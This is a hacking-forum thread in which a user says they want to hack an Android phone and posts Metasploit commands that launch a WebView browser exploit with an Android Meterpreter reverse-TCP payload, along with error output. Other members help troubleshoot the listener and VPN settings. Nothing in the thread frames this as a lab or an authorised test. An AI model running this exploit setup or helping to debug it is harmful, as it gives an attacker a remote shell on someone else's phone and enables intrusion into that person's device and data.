The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.
|
Android hacking without file with Metasploit.
filter_list
|
|
|
Six Years of Service
Posts: 163
Threads: 70
Android hacking without file with Metasploit. 02-19-2020, 12:51 PM
#1
Hello,
I want to hack an Android cell phone with the Metasploit. I did below commands:
Code:
use exploit/android/browser/webview_addjavascriptinterface
set payload android/meterpreter/reverse_tcp
set srvhost VPN IP
set lhost VPN IP
set lport 4444
run
My system connected to a VPN server and when I set the VPN IP as "srvhost" and "lhost" then it show me below error:
Code:
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[-] Handler failed to bind to VPN IP:4444:- -
[*] Started reverse TCP handler on 0.0.0.0:4444
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (VPN IP:8080).
Can I use the Metasploit with VPN?
Thank you.
•
Seven Years of Service
Posts: 62
Threads: 6
RE: Android hacking without file with Metasploit. 02-19-2020, 01:36 PM
#2
(02-19-2020, 12:51 PM)Hack3rcon Wrote: Hello,
I want to hack an Android cell phone with the Metasploit. I did below commands:
Code:
use exploit/android/browser/webview_addjavascriptinterface
set payload android/meterpreter/reverse_tcp
set srvhost VPN IP
set lhost VPN IP
set lport 4444
run
My system connected to a VPN server and when I set the VPN IP as "srvhost" and "lhost" then it show me below error:
Code:
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[-] Handler failed to bind to VPN IP:4444:- -
[*] Started reverse TCP handler on 0.0.0.0:4444
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (VPN IP:8080).
Can I use the Metasploit with VPN?
Thank you.
Hi, basically you need to set the LHOST to the VPN, not your internal address. You can find more info here:
https://security.stackexchange.com/quest...n-over-vpn
Not to be rude, but that took 2 seconds to Google so please try and give that a go first before asking questions.
•
Six Years of Service
Posts: 163
Threads: 70
RE: Android hacking without file with Metasploit. 02-23-2020, 11:55 AM
#3
(02-19-2020, 01:36 PM)Sartux Wrote: (02-19-2020, 12:51 PM)Hack3rcon Wrote: Hello,
I want to hack an Android cell phone with the Metasploit. I did below commands:
Code:
use exploit/android/browser/webview_addjavascriptinterface
set payload android/meterpreter/reverse_tcp
set srvhost VPN IP
set lhost VPN IP
set lport 4444
run
My system connected to a VPN server and when I set the VPN IP as "srvhost" and "lhost" then it show me below error:
Code:
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[-] Handler failed to bind to VPN IP:4444:- -
[*] Started reverse TCP handler on 0.0.0.0:4444
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (VPN IP:8080).
Can I use the Metasploit with VPN?
Thank you.
Hi, basically you need to set the LHOST to the VPN, not your internal address. You can find more info here:
https://security.stackexchange.com/quest...n-over-vpn
Not to be rude, but that took 2 seconds to Google so please try and give that a go first before asking questions.
Thank you, but I got below error:
Code:
> exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[-] Handler failed to bind to VPN IP:4444:- -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Using URL: http://0.0.0.0:8080/ibo
[*] Local IP: http://10.7.1.8:8080/ibo
[*] Server started.
•
Six Years of Service
Posts: 163
Threads: 70
RE: Android hacking without file with Metasploit. 02-24-2020, 11:04 PM
#4
Any idea? As you see, i set the VPN IP.
•
Seven Years of Service
Posts: 228
Threads: 37
RE: Android hacking without file with Metasploit. 02-25-2020, 02:29 AM
#5
(02-24-2020, 11:04 PM)Hack3rcon Wrote: Any idea? As you see, i set the VPN IP.
look at your URL looks a little off to me 0.0.0.0?
•